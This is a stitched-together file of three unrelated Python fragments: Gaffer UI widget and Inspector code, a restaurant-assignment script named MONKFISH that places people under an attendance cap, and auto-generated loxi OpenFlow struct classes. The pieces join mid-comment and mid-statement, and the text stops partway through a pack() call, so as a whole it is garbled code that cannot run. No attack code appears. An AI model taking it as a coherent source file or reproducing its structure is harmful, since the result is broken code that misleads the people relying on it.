    def __formatPrimitiveVariables( self, values ) :

        result = []
        for value in values :
            s = str( value.interpolation )
            s += " " + value.data.typeName()
            if hasattr( value.data, "getInterpretation" ) :
                s += " (" + str( value.data.getInterpretation() ) + ")"
            result.append( s )

        return result

    def __numbersToAlignedStrings( self, values ) :
        # Format ints as %d and floats as %.4f, right-justified to a common
        # width so columns line up in the <pre> blocks.
        if isinstance( values[0], int ) :
            values = [ "%d" % v for v in values ]
        else :
            # the funky comparison with 0.0 converts -0.0 to 0.0
            values = [ "%.4f" % ( v if v != 0.0 else 0.0 ) for v in values ]

        if len( values ) > 1 :
            maxLength = max( len( v ) for v in values )
            values = [ v.rjust( maxLength ) for v in values ]

        return values

    def __highlightFromFirstDifference( self, values ) :

        if len( values ) < 2 or not self.__highlightDiffs :
            return values

        # d is the index of the first differing digit, or -1 if there is no difference
        d = next( ( i for i in xrange( 0, len( values[0] ) ) if values[0][i] != values[1][i] ), -1 )
        if d < 0 :
            return values

        return [
            values[0][:d] + "<span class=diffA>" + values[0][d:] + "</span>",
            values[1][:d] + "<span class=diffB>" + values[1][d:] + "</span>",
        ]

    def __buttonPress( self, widget, event ) :

        return event.buttons == event.Buttons.Left

    def __dragBegin( self, widget, event ) :
        # Dragging a frame carries its underlying (unformatted) value.
        if event.buttons != event.Buttons.Left :
            return None

        GafferUI.Pointer.setCurrent( "values" )
        return self.__values[0] if self.frame( 0 ).isAncestorOf( widget ) else self.__values[1]

    def __dragEnd( self, widget, event ) :

        GafferUI.Pointer.setCurrent( None )

    __htmlHeader = (
        "<html><head><style type=text/css>"
        ".diffA { background-color:rgba( 255, 77, 3, 75 ); }"
        ".diffB { background-color:rgba( 167, 214, 6, 75 ); }"
        "td { padding:3px; }"
        "</style></head>"
        "<body>"
    )

    __htmlFooter = "</body></html>"

##########################################################################
# Row
##########################################################################

## A class to simplify the process of making rows with alternating colours.
class Row( GafferUI.Widget ) :

    def __init__( self, borderWidth = 4, alternate = False, **kw ) :

        self.__frame = GafferUI.Frame( borderWidth = borderWidth )

        GafferUI.Widget.__init__( self, self.__frame, **kw )

        self.__frame.setChild(
            GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )
        )

        self.__alternate = None
        self.setAlternate( alternate )

    def listContainer( self ) :

        return self.__frame.getChild()

    def setAlternate( self, alternate ) :
        # Restyle (via Qt object name) only when the flag actually changes.
        if alternate == self.__alternate :
            return

        self.__alternate = alternate
        self.__frame._qtWidget().setObjectName( "gafferLighter" if alternate else "" )
        self.__frame._repolish()

    def getAlternate( self ) :

        return self.__alternate

##########################################################################
# Inspector
##########################################################################

## Abstract class for a callable which inspects a Target and returns
# a value. Inspectors are key to allowing the UI to perform the same
# query over multiple targets to generate history and inheritance
# queries.
class Inspector( object ) :

    ## Must be implemented to return a descriptive name
    # for what is being inspected.
    def name( self ) :

        raise NotImplementedError

    ## Should return True if the Inspector's results
    # are based on attributes - this will enable inheritance
    # queries for the inspector.
    def inspectsAttributes( self ) :

        return False

    ## Must be implemented to inspect the target and return
    # a value to be displayed. When inspectsAttributes()==True,
    # this method must accept an ignoreInheritance keyword
    # argument (defaulting to False).
    def __call__( self, target, **kw ) :

        raise NotImplementedError

    ## May be implemented to return a list of "child" inspectors -
    # this is used by the DiffColumn to obtain
#MONKFISH v 0.1
#<EMAIL>
#
# Assigns attendees to dinner/brunch restaurants from a ranked-preference
# CSV, bumping randomly chosen people to lower preferences when a
# restaurant exceeds the attendance cap.
#
# Fixes in this revision:
#  * NameError: `numpNum` -> `bumpNum` in the brunch third-choice pass.
#  * np.random.choice(..., replace=False): sampling WITH replacement could
#    draw the same person twice, making the second list.remove() raise.
import pandas as pd
import numpy as np
import random

print("\nLoading data...\n")

##################################################
###YOU CAN CHANGE THE NAME OF DATA FILE HERE!!!###
data = pd.read_csv('preferences2.csv', header=0,encoding="utf-8-sig")###
##################################################

####################
##SET THE CAP HERE##
cap = 7
####################

dinner = data.loc[:,'Name':'SmokeShop']
brunch = data.loc[:,'Area4':]
names = data['Name']
brunch = pd.concat([names,brunch], axis=1)
print("The attendance cap is currently set at " + str(cap) + ".\n")

kika = []
thelonious = []
smokeshop =[]
ole = []
meadhall = []
indiapav = []
veggieGalaxy = []
names = data['Name'].tolist()
assigned = []
unassigned = []
assignmentLists = [indiapav,thelonious,meadhall,kika,ole,smokeshop]
restaurantNames = dinner.columns[1:].tolist()
assignmentDict = dict(zip(restaurantNames, assignmentLists))
zeroes = [0]*len(names)
# preference score = how far down their list each person has been pushed
preferenceScoreDict = dict(zip(names, zeroes))

for col in dinner.columns[1:]:
    d = dinner[col]
    i = 0
    while i < len(d):
        if d[i] == 1:
            #assign first preference
            assignmentDict[col].append(names[i])
            #mark the person as assigned.
            assigned.append(names[i])
            #update the person's cumulative preference score
            preferenceScoreDict[names[i]] += 1
        i += 1

#Now all first choices have been granted, check whether any restaurants are over capacity
def dinnerCapacityCheck():
    """Classify each dinner restaurant as over, under, or exactly at the cap."""
    dinnerOverassigned = []
    dinnerUnderassigned = []
    dinnerFull = []
    for rest in restaurantNames:
        if len(assignmentDict[rest]) > cap:
            #print(str(rest) + ' is overassigned')
            dinnerOverassigned.append(rest)
        elif len(assignmentDict[rest]) < cap:
            #print(str(rest) + ' is underassigned')
            dinnerUnderassigned.append(rest)
        elif len(assignmentDict[rest]) == cap:
            #print(str(rest) + ' is full')
            dinnerFull.append(rest)
    return dinnerOverassigned, dinnerUnderassigned, dinnerFull

dinnerOverassigned, dinnerUnderassigned, dinnerFull = dinnerCapacityCheck()
dinnerDone=False
if len(dinnerOverassigned) == 0:
    #everyone gets their first choice, ideal solution.
    dinnerDone = True
    for name in restaurantNames:
        print("The following have been assigned to " + str(name) + ":")
        for x in assignmentDict[name]:
            print(str(x) + '\n')
elif len(dinnerOverassigned) > 0:
    #some people will have to be reassigned.
    #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap
    for rest in dinnerOverassigned:
        dinnerList = assignmentDict[rest]
        bumpNum = len(dinnerList)-cap
        # replace=False: never draw the same person twice (a duplicate draw
        # would crash on the second .remove())
        gotBumped = np.random.choice(dinnerList, bumpNum, replace=False)
        for b in gotBumped:
            assignmentDict[rest].remove(b) #kick that dude out
            assigned.remove(b) #mark them unassigned
            unassigned.append(b)
            preferenceScoreDict[b] += 1 #increment their preference score
    #assign bumped people to their second choice.
    for x in unassigned:
        if x in assigned:
            print(str(x) + " is already assigned.")
            unassigned.remove(x)
            continue
        i = names.index(x)
        row = dinner.ix[i] #this should be the row of the the bumped person
        # NOTE(review): DataFrame.ix is removed in modern pandas; `row` is
        # unused below — the row index is recomputed by the scan that follows.
        #reassign them to their second choice
        j=0
        #find the row index of this person who must be reassigned.
        while j < len(dinner['Name']):
            if dinner['Name'][j] == x:
                break
            j += 1
        #Search for which restaurant was their second choice.
        for col in dinner.columns[1:]:
            d = dinner[col][j]
            if d == 2:
                #assign second preference
                assignmentDict[col].append(names[j])
                #mark the person as assigned.
                if names[j] not in assigned:
                    assigned.append(names[j])

for a in assigned:
    if a in unassigned:
        unassigned.remove(a)
dinnerOverassigned, dinnerUnderassigned, dinnerFull = dinnerCapacityCheck()

#now second choices have been assigned.
if len(dinnerOverassigned) == 0 and dinnerDone==False:
    dinnerDone = True
    for name in restaurantNames:
        print("The following have been assigned to " + str(name) + ":")
        for x in assignmentDict[name]:
            print(str(x) + '\n')
#consider bumping people to third choice.
elif len(dinnerOverassigned) > 0 and dinnerDone==False:
    #some people will have to be reassigned.
    #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap
    for rest in dinnerOverassigned:
        dinnerList = assignmentDict[rest]
        bumpNum = len(dinnerList)-cap
        bumpOrder = []
        bumpOrder = random.sample(dinnerList, len(dinnerList))
        #want to preferentially bump people who haven't yet been bumped.
        gotBumped = []
        if len(bumpOrder) > 0:
            for x in bumpOrder:
                if len(gotBumped) == bumpNum:
                    break
                if preferenceScoreDict[x] == 1:
                    gotBumped.append(x)
                else:
                    continue
        for b in gotBumped:
            assignmentDict[rest].remove(b) #kick that dude out
            assigned.remove(b) #mark them unassigned
            unassigned.append(b)
            preferenceScoreDict[b] += 1 #increment their preference score
    #assign bumped people to their second choice.
    for x in unassigned:
        if x in assigned:
            print(str(x) + " is already assigned.")
            unassigned.remove(x)
            continue
        i = names.index(x)
        row = dinner.ix[i] #this should be the row of the the bumped person
        #reassign them to their second choice
        j=0
        #find the row index of this person who must be reassigned.
        while j < len(dinner['Name']):
            if dinner['Name'][j] == x:
                break
            j += 1
        #Search for which restaurant was their third choice.
        for col in dinner.columns[1:]:
            d = dinner[col][j]
            if d == 3:
                #assign second preference
                assignmentDict[col].append(names[j])
                #mark the person as assigned.
                if names[j] not in assigned:
                    assigned.append(names[j])

for a in assigned:
    if a in unassigned:
        unassigned.remove(a)
dinnerOverassigned, dinnerUnderassigned, dinnerFull = dinnerCapacityCheck()

#if still overassigned after the second choice, run the brunch algorithm
#then minimize preference scores as a last resort.
if len(dinnerOverassigned) == 0 and dinnerDone==False:
    dinnerDone = True
    for name in restaurantNames:
        print("The following have been assigned to " + str(name) + ":")
        for x in assignmentDict[name]:
            print(str(x) + '\n')

####START OF BRUNCH###
print("\nBeep Boop...assigning brunches...boop beep\n")
Area4 = []
PaintedBurro = []
RusselHouse =[]
Christophers = []
Ryles = []
CambridgeCommons = []
veggieGalaxy = []
assigned = []
unassigned = []
assignmentLists = [Area4,CambridgeCommons,Christophers,PaintedBurro,Ryles,veggieGalaxy,RusselHouse]
restaurantNames = brunch.columns[1:].tolist()
assignmentDict = dict(zip(restaurantNames, assignmentLists))

for col in brunch.columns[1:]:
    d = brunch[col]
    i = 0
    while i < len(d):
        if d[i] == 1:
            #assign first preference
            assignmentDict[col].append(names[i])
            #mark the person as assigned.
            assigned.append(names[i])
            #update the person's cumulative preference score
            preferenceScoreDict[names[i]] += 1
        i += 1

#Now all first choices have been granted, check whether any restaurants are over capacity
def brunchCapacityCheck():
    """Classify each brunch restaurant as over, under, or exactly at the cap."""
    brunchOverassigned = []
    brunchUnderassigned = []
    brunchFull = []
    for rest in restaurantNames:
        if len(assignmentDict[rest]) > cap:
            #print(str(rest) + ' is overassigned')
            brunchOverassigned.append(rest)
        elif len(assignmentDict[rest]) < cap:
            #print(str(rest) + ' is underassigned')
            brunchUnderassigned.append(rest)
        elif len(assignmentDict[rest]) == cap:
            #print(str(rest) + ' is full')
            brunchFull.append(rest)
    return brunchOverassigned, brunchUnderassigned, brunchFull

brunchOverassigned, brunchUnderassigned, brunchFull = brunchCapacityCheck()
brunchDone=False
if len(brunchOverassigned) == 0:
    #everyone gets their first choice, ideal solution.
    brunchDone = True
    for name in restaurantNames:
        print("The following have been assigned to " + str(name) + ":")
        for x in assignmentDict[name]:
            print(str(x) + '\n')
elif len(brunchOverassigned) > 0:
    #some people will have to be reassigned.
    #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap
    for rest in brunchOverassigned:
        brunchList = assignmentDict[rest]
        bumpNum = len(brunchList)-cap
        # replace=False: see the dinner pass above.
        gotBumped = np.random.choice(brunchList, bumpNum, replace=False)
        for b in gotBumped:
            assignmentDict[rest].remove(b) #kick that dude out
            assigned.remove(b) #mark them unassigned
            unassigned.append(b)
            preferenceScoreDict[b] += 1 #increment their preference score
    #assign bumped people to their second choice.
    for x in unassigned:
        if x in assigned:
            print(str(x) + " is already assigned.")
            unassigned.remove(x)
            continue
        #print(x)
        i = names.index(x)
        row = brunch.ix[i] #this should be the row of the the bumped person
        #reassign them to their second choice
        j=0
        #find the row index of this person who must be reassigned.
        while j < len(brunch['Name']):
            if brunch['Name'][j] == x:
                break
            j += 1
        #Search for which restaurant was their second choice.
        for col in brunch.columns[1:]:
            d = brunch[col][j]
            if d == 2:
                #assign second preference
                assignmentDict[col].append(names[j])
                #mark the person as assigned.
                if names[j] not in assigned:
                    assigned.append(names[j])

for a in assigned:
    if a in unassigned:
        unassigned.remove(a)
brunchOverassigned, brunchUnderassigned,brunchFull = brunchCapacityCheck()

if len(brunchOverassigned) == 0 and brunchDone==False:
    brunchDone = True
    for name in restaurantNames:
        print("The following have been assigned to " + str(name) + ":")
        for x in assignmentDict[name]:
            print(str(x) + '\n')
#consider bumping people to third choice.
elif len(brunchOverassigned) > 0 and brunchDone==False:
    #some people will have to be reassigned.
    #for each overassigned restaurant, randomly choose the number of people required to kick out to go below the cap
    for rest in brunchOverassigned:
        brunchList = assignmentDict[rest]
        bumpNum = len(brunchList)-cap
        bumpOrder = []
        bumpOrder = random.sample(brunchList,len(brunchList))
        #want to preferentially bump people who haven't yet been bumped.
        gotBumped = []
        if len(bumpOrder) > 0:
            for x in bumpOrder:
                if len(gotBumped) == bumpNum:
                    break
                if preferenceScoreDict[x] == 1:
                    gotBumped.append(x)
                else:
                    continue
        if len(gotBumped) < bumpNum:
            for x in bumpOrder:
                if len(gotBumped) == bumpNum:
                    break
                if preferenceScoreDict[x] == 2:
                    gotBumped.append(x)
                else:
                    continue
        if len(gotBumped) < bumpNum:  # was `numpNum`: NameError at runtime
            for x in bumpOrder:
                if len(gotBumped) == bumpNum:
                    break
                if preferenceScoreDict[x] == 3:
                    gotBumped.append(x)
                else:
                    continue
        for b in gotBumped:
            assignmentDict[rest].remove(b) #kick that dude out
            assigned.remove(b) #mark them unassigned
            unassigned.append(b)
            preferenceScoreDict[b] += 1 #increment their preference score
    #assign bumped people to their third choice.
    for x in unassigned:
        if x in assigned:
            print(str(x) + " is already assigned.")
            unassigned.remove(x)
            continue
        #print(x)
        i = names.index(x)
        row = brunch.ix[i] #this should be the row of the the bumped person
        #reassign them to their second choice
        j=0
        #find the
= 0
        # (fragment) tail of bsn_vlan_mac.__init__ — the class header lies above this chunk.
        if mac != None:
            self.mac = mac
        else:
            self.mac = [0,0,0,0,0,0]
        return

    def pack(self):
        # Serialize in network byte order: vlan_vid (uint16) then 6 MAC octets.
        packed = []
        packed.append(struct.pack("!H", self.vlan_vid))
        packed.append(struct.pack("!6B", *self.mac))
        return functools.reduce(lambda x,y: x+y, packed)

    @staticmethod
    def unpack(reader):
        # Inverse of pack(): consume vlan_vid then the 6-byte MAC from 'reader'.
        obj = bsn_vlan_mac()
        obj.vlan_vid = reader.read("!H")[0]
        obj.mac = list(reader.read('!6B'))
        return obj

    def __eq__(self, other):
        # Field-wise equality; distinct types never compare equal.
        if type(self) != type(other): return False
        if self.vlan_vid != other.vlan_vid: return False
        if self.mac != other.mac: return False
        return True

    def pretty_print(self, q):
        # Render a human-readable dump through the pretty-printer 'q'.
        q.text("bsn_vlan_mac {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("vlan_vid = ");
                q.text("%#x" % self.vlan_vid)
                q.text(",");
                q.breakable()
                q.text("mac = ");
                q.text(util.pretty_mac(self.mac))
                q.breakable()
        q.text('}')

class bsn_vport_l2gre(bsn_vport):
    # Auto-generated wire struct: BSN L2-GRE virtual port (bsn_vport subtype 1).
    type = 1

    def __init__(self, flags=None, port_no=None, loopback_port_no=None, local_mac=None, nh_mac=None, src_ip=None, dst_ip=None, dscp=None, ttl=None, vpn=None, rate_limit=None, if_name=None):
        # Every field defaults to a zero value when not supplied.
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if loopback_port_no != None:
            self.loopback_port_no = loopback_port_no
        else:
            self.loopback_port_no = 0
        if local_mac != None:
            self.local_mac = local_mac
        else:
            self.local_mac = [0,0,0,0,0,0]
        if nh_mac != None:
            self.nh_mac = nh_mac
        else:
            self.nh_mac = [0,0,0,0,0,0]
        if src_ip != None:
            self.src_ip = src_ip
        else:
            self.src_ip = 0
        if dst_ip != None:
            self.dst_ip = dst_ip
        else:
            self.dst_ip = 0
        if dscp != None:
            self.dscp = dscp
        else:
            self.dscp = 0
        if ttl != None:
            self.ttl = ttl
        else:
            self.ttl = 0
        if vpn != None:
            self.vpn = vpn
        else:
            self.vpn = 0
        if rate_limit != None:
            self.rate_limit = rate_limit
        else:
            self.rate_limit = 0
        if if_name != None:
            self.if_name = if_name
        else:
            self.if_name = ""
        return

    def pack(self):
        # TLV encoding: type, then a length field back-patched after the body is built.
        packed = []
        packed.append(struct.pack("!H", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 1
        packed.append(struct.pack("!L", self.flags))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(util.pack_port_no(self.loopback_port_no))
        packed.append(struct.pack("!6B", *self.local_mac))
        packed.append(struct.pack("!6B", *self.nh_mac))
        packed.append(struct.pack("!L", self.src_ip))
        packed.append(struct.pack("!L", self.dst_ip))
        packed.append(struct.pack("!B", self.dscp))
        packed.append(struct.pack("!B", self.ttl))
        packed.append(b'\x00' * 2)
        packed.append(struct.pack("!L", self.vpn))
        packed.append(struct.pack("!L", self.rate_limit))
        packed.append(struct.pack("!16s", self.if_name.encode()))
        length = sum([len(x) for x in packed])
        packed[1] = struct.pack("!H", length)
        return functools.reduce(lambda x,y: x+y, packed)

    @staticmethod
    def unpack(reader):
        # Mirror of pack(); reads are bounded to this TLV's payload via slice().
        obj = bsn_vport_l2gre()
        _type = reader.read("!H")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.flags = reader.read("!L")[0]
        obj.port_no = util.unpack_port_no(reader)
        obj.loopback_port_no = util.unpack_port_no(reader)
        obj.local_mac = list(reader.read('!6B'))
        obj.nh_mac = list(reader.read('!6B'))
        obj.src_ip = reader.read("!L")[0]
        obj.dst_ip = reader.read("!L")[0]
        obj.dscp = reader.read("!B")[0]
        obj.ttl = reader.read("!B")[0]
        reader.skip(2)  # matches the 2 pad bytes written by pack()
        obj.vpn = reader.read("!L")[0]
        obj.rate_limit = reader.read("!L")[0]
        obj.if_name = reader.read("!16s")[0].decode().rstrip("\x00")
        return obj

    def __eq__(self, other):
        # Field-wise equality over every wire field.
        if type(self) != type(other): return False
        if self.flags != other.flags: return False
        if self.port_no != other.port_no: return False
        if self.loopback_port_no != other.loopback_port_no: return False
        if self.local_mac != other.local_mac: return False
        if self.nh_mac != other.nh_mac: return False
        if self.src_ip != other.src_ip: return False
        if self.dst_ip != other.dst_ip: return False
        if self.dscp != other.dscp: return False
        if self.ttl != other.ttl: return False
        if self.vpn != other.vpn: return False
        if self.rate_limit != other.rate_limit: return False
        if self.if_name != other.if_name: return False
        return True

    def pretty_print(self, q):
        # Human-readable dump; flags rendered symbolically via value_name_map.
        q.text("bsn_vport_l2gre {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("flags = ");
                value_name_map = {1: 'OF_BSN_VPORT_L2GRE_LOCAL_MAC_IS_VALID', 2: 'OF_BSN_VPORT_L2GRE_DSCP_ASSIGN', 4: 'OF_BSN_VPORT_L2GRE_DSCP_COPY', 8: 'OF_BSN_VPORT_L2GRE_LOOPBACK_IS_VALID', 16: 'OF_BSN_VPORT_L2GRE_RATE_LIMIT_IS_VALID'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(",");
                q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(",");
                q.breakable()
                q.text("loopback_port_no = ");
                q.text(util.pretty_port(self.loopback_port_no))
                q.text(",");
                q.breakable()
                q.text("local_mac = ");
                q.text(util.pretty_mac(self.local_mac))
                q.text(",");
                q.breakable()
                q.text("nh_mac = ");
                q.text(util.pretty_mac(self.nh_mac))
                q.text(",");
                q.breakable()
                q.text("src_ip = ");
                q.text(util.pretty_ipv4(self.src_ip))
                q.text(",");
                q.breakable()
                q.text("dst_ip = ");
                q.text(util.pretty_ipv4(self.dst_ip))
                q.text(",");
                q.breakable()
                q.text("dscp = ");
                q.text("%#x" % self.dscp)
                q.text(",");
                q.breakable()
                q.text("ttl = ");
                q.text("%#x" % self.ttl)
                q.text(",");
                q.breakable()
                q.text("vpn = ");
                q.text("%#x" % self.vpn)
                q.text(",");
                q.breakable()
                q.text("rate_limit = ");
                q.text("%#x" % self.rate_limit)
                q.text(",");
                q.breakable()
                q.text("if_name = ");
                q.pp(self.if_name)
                q.breakable()
        q.text('}')

# Register this subtype so bsn_vport.unpack can dispatch on the type field.
bsn_vport.subtypes[1] = bsn_vport_l2gre

class bsn_vport_q_in_q(bsn_vport):
    # Auto-generated wire struct: BSN Q-in-Q virtual port (bsn_vport subtype 0).
    type = 0

    def __init__(self, port_no=None, ingress_tpid=None, ingress_vlan_id=None, egress_tpid=None, egress_vlan_id=None, if_name=None):
        # Every field defaults to a zero value when not supplied.
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if ingress_tpid != None:
            self.ingress_tpid = ingress_tpid
        else:
            self.ingress_tpid = 0
        if ingress_vlan_id != None:
            self.ingress_vlan_id = ingress_vlan_id
        else:
            self.ingress_vlan_id = 0
        if egress_tpid != None:
            self.egress_tpid = egress_tpid
        else:
            self.egress_tpid = 0
        if egress_vlan_id != None:
            self.egress_vlan_id = egress_vlan_id
        else:
            self.egress_vlan_id = 0
        if if_name != None:
            self.if_name = if_name
        else:
            self.if_name = ""
        return

    def pack(self):
        # TLV encoding; length back-patched at index 1 once the body is known.
        packed = []
        packed.append(struct.pack("!H", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 1
        packed.append(struct.pack("!L", self.port_no))
        packed.append(struct.pack("!H", self.ingress_tpid))
        packed.append(struct.pack("!H", self.ingress_vlan_id))
        packed.append(struct.pack("!H", self.egress_tpid))
        packed.append(struct.pack("!H", self.egress_vlan_id))
        packed.append(struct.pack("!16s", self.if_name.encode()))
        length = sum([len(x) for x in packed])
        packed[1] = struct.pack("!H", length)
        return functools.reduce(lambda x,y: x+y, packed)

    @staticmethod
    def unpack(reader):
        # Mirror of pack(); reads bounded to this TLV's payload.
        obj = bsn_vport_q_in_q()
        _type = reader.read("!H")[0]
        assert(_type == 0)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.port_no = reader.read("!L")[0]
        obj.ingress_tpid = reader.read("!H")[0]
        obj.ingress_vlan_id = reader.read("!H")[0]
        obj.egress_tpid = reader.read("!H")[0]
        obj.egress_vlan_id = reader.read("!H")[0]
        obj.if_name = reader.read("!16s")[0].decode().rstrip("\x00")
        return obj

    def __eq__(self, other):
        # Field-wise equality over every wire field.
        if type(self) != type(other): return False
        if self.port_no != other.port_no: return False
        if self.ingress_tpid != other.ingress_tpid: return False
        if self.ingress_vlan_id != other.ingress_vlan_id: return False
        if self.egress_tpid != other.egress_tpid: return False
        if self.egress_vlan_id != other.egress_vlan_id: return False
        if self.if_name != other.if_name: return False
        return True

    def pretty_print(self, q):
        # Human-readable dump of all Q-in-Q fields.
        q.text("bsn_vport_q_in_q {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("port_no = ");
                q.text("%#x" % self.port_no)
                q.text(",");
                q.breakable()
                q.text("ingress_tpid = ");
                q.text("%#x" % self.ingress_tpid)
                q.text(",");
                q.breakable()
                q.text("ingress_vlan_id = ");
                q.text("%#x" % self.ingress_vlan_id)
                q.text(",");
                q.breakable()
                q.text("egress_tpid = ");
                q.text("%#x" % self.egress_tpid)
                q.text(",");
                q.breakable()
                q.text("egress_vlan_id = ");
                q.text("%#x" % self.egress_vlan_id)
                q.text(",");
                q.breakable()
                q.text("if_name = ");
                q.pp(self.if_name)
                q.breakable()
        q.text('}')

# Register this subtype so bsn_vport.unpack can dispatch on the type field.
bsn_vport.subtypes[0] = bsn_vport_q_in_q

class bsn_vrf_counter_stats_entry(loxi.OFObject):
    # Auto-generated wire struct: per-VRF counter stats entry.

    def __init__(self, vrf=None, values=None):
        if vrf != None:
            self.vrf = vrf
        else:
            self.vrf = 0
        if values != None:
            self.values = values
        else:
            self.values = []
        return

    def pack(self):
        # Length-prefixed record: length back-patched at index 0, 2 pad bytes, vrf, value list.
        packed = []
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 0
        packed.append(b'\x00' * 2)
        packed.append(struct.pack("!L", self.vrf))
        packed.append(loxi.generic_util.pack_list(self.values))
        length = sum([len(x) for x in packed])
        packed[0] = struct.pack("!H", length)
        return functools.reduce(lambda x,y: x+y, packed)

    @staticmethod
    def unpack(reader):
        # Mirror of pack(); 'values' decoded as a list of uint64 records.
        obj = bsn_vrf_counter_stats_entry()
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 2)
        reader.skip(2)
        obj.vrf = reader.read("!L")[0]
        obj.values = loxi.generic_util.unpack_list(reader, ofp.common.uint64.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.vrf != other.vrf: return False
        if self.values != other.values: return False
        return True

    def pretty_print(self, q):
        q.text("bsn_vrf_counter_stats_entry {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("vrf = ");
                q.text("%#x" % self.vrf)
                q.text(",");
                q.breakable()
                q.text("values = ");
                q.pp(self.values)
                q.breakable()
        q.text('}')

class bucket(loxi.OFObject):
    # Auto-generated wire struct: OpenFlow group bucket (actions + properties).

    def __init__(self, bucket_id=None, actions=None, properties=None):
        if bucket_id != None:
            self.bucket_id = bucket_id
        else:
            self.bucket_id = 0
        if actions != None:
            self.actions = actions
        else:
            self.actions = []
        if properties != None:
            self.properties = properties
        else:
            self.properties = []
        return

    def pack(self):
        # Two back-patched fields: total length (index 0) and the action-array
        # byte length (index 1), which covers only the packed actions list.
        packed = []
        packed.append(struct.pack("!H", 0)) # placeholder for len at index 0
        packed.append(struct.pack("!H", 0)) # placeholder for action_array_len at index 1
        packed.append(struct.pack("!L", self.bucket_id))
        packed.append(loxi.generic_util.pack_list(self.actions))
        packed[1] = struct.pack("!H", len(packed[-1]))
        packed.append(loxi.generic_util.pack_list(self.properties))
        length = sum([len(x) for x in packed])
        packed[0] = struct.pack("!H", length)
        return functools.reduce(lambda x,y: x+y, packed)

    @staticmethod
    def unpack(reader):
        # Mirror of pack(): actions bounded by _action_array_len, properties fill the rest.
        obj = bucket()
        _len = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_len, 2)
        _action_array_len = reader.read("!H")[0]
        obj.bucket_id = reader.read("!L")[0]
        obj.actions = loxi.generic_util.unpack_list(reader.slice(_action_array_len), ofp.action.action.unpack)
        obj.properties = loxi.generic_util.unpack_list(reader, ofp.common.group_bucket_prop.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.bucket_id != other.bucket_id: return False
        if self.actions != other.actions: return False
        if self.properties != other.properties: return False
        return True

    def pretty_print(self, q):
        # bucket_id has reserved sentinel values; print those symbolically.
        q.text("bucket {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("bucket_id = ");
                value_name_map = {4294967040: 'OFPG_BUCKET_MAX', 4294967293: 'OFPG_BUCKET_FIRST', 4294967294: 'OFPG_BUCKET_LAST', 4294967295: 'OFPG_BUCKET_ALL'}
                if self.bucket_id in value_name_map:
                    q.text("%s(%d)" % (value_name_map[self.bucket_id], self.bucket_id))
                else:
                    q.text("%#x" % self.bucket_id)
                q.text(",");
                q.breakable()
                q.text("actions = ");
                q.pp(self.actions)
                q.text(",");
                q.breakable()
                q.text("properties = ");
                q.pp(self.properties)
                q.breakable()
        q.text('}')

class bucket_counter(loxi.OFObject):
    # Auto-generated wire struct: per-bucket packet/byte counters (two uint64s).

    def __init__(self, packet_count=None, byte_count=None):
        if packet_count != None:
            self.packet_count = packet_count
        else:
            self.packet_count = 0
        if byte_count != None:
            self.byte_count = byte_count
        else:
            self.byte_count = 0
        return

    def pack(self):
        packed = []
        packed.append(struct.pack("!Q", self.packet_count))
        packed.append(struct.pack("!Q", self.byte_count))
        return functools.reduce(lambda x,y: x+y, packed)

    @staticmethod
    def unpack(reader):
        obj = bucket_counter()
        obj.packet_count = reader.read("!Q")[0]
        obj.byte_count = reader.read("!Q")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.packet_count != other.packet_count: return False
        if self.byte_count != other.byte_count: return False
        return True

    def pretty_print(self, q):
        q.text("bucket_counter {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("packet_count = ");
                q.text("%#x" % self.packet_count)
                q.text(",");
                q.breakable()
                q.text("byte_count = ");
                q.text("%#x" % self.byte_count)
                q.breakable()
        q.text('}')

class bundle_features_prop(loxi.OFObject):
    # Auto-generated TLV base class for bundle-features properties; subtype
    # classes register themselves in 'subtypes' keyed by the type field.
    subtypes = {}

    def __init__(self, type=None):
        if type != None:
            self.type = type
        else:
            self.type = 0
        return

    def pack(self):
        # (fragment) chunk is cut off mid-statement here.
        packed = []
        packed.append(struct.pack("!H",
